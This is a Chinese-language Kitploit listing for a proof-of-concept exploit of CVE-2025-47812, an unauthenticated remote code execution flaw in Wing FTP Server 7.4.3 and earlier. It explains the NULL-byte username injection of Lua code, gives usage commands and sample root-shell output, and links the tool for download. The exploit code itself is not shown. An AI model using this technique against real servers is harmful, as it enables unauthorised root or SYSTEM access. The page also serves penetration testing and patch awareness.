Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC — CVE-2025-47812 的概念验证漏洞利用:Wing FTP Server <= 7.4.3 中通过用户名参数中的 NULL 字节注入实现未认证远程代码执行,从而获得 root/SYSTEM shell 访问权限。 | Kitploit
工具/GitHubGitHub/estebanzarate/cve-2025-47812-wing-ftp-server-7.4.3-unauthenticated-rce-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Payload 开发
GitHubestebanzarate/cve-2025-47812-wing-ftp-server-7.4.3-unauthenticated-rce-poc

CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC

CVE-2025-47812 的概念验证漏洞利用:Wing FTP Server <= 7.4.3 中通过用户名参数中的 NULL 字节注入实现未认证远程代码执行,从而获得 root/SYSTEM shell 访问权限。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
216个月前尚未审核
分享

CVE-2025-47812 — Wing FTP Server <= 7.4.3 未授权远程代码执行 (PoC)

Wing FTP Server <= 7.4.3 中的未授权远程代码执行漏洞。在登录时向 username 参数注入 NULL 字节会导致 Lua 代码写入会话文件。当使用生成的会话 cookie 访问 /dir.html 时,注入的代码会被执行——在 Linux 上以 root 权限,在 Windows 上以 SYSTEM 权限。


工作原理

  1. 构造一个 POST 请求到 /loginok.html,在 username 字段中注入一个 NULL 字节后跟 Lua 代码。
  2. 服务器创建一个包含未清理的用户名(包括 Lua 载荷)的会话文件。
  3. 使用返回的 UID cookie 发送 GET 请求到 /dir.html 触发注入的 Lua 代码的执行。
  4. 脚本在命令之间注销以避免触及服务器的并发会话限制。

环境要求

  • Python 3
  • 安装依赖:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

使用方法

root@kitploit:~
python3 exploit.py -u http://TARGET

示例:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10
[*] 目标 http://10.10.10.10
[*] 使用注入载荷登录...
[*] 触发载荷...
[+] 目标存在漏洞!命令输出:
uid=0(root) gid=0(root) groups=0(root)

[+] Shell 已打开。输入 'exit' 或 Ctrl+C 退出。

Shell> whoami
root

参考

  • CVE-2025-47812
  • Wing FTP Server 7.4.4 发布 (修复)
  • 原作者 PoC by 4m3rr0r

致谢

  • 发现与原始漏洞利用: Sheikh Mohammad Hasan 又名 4m3rr0r
  • 清理与简化: Esteban Zárate
下载工具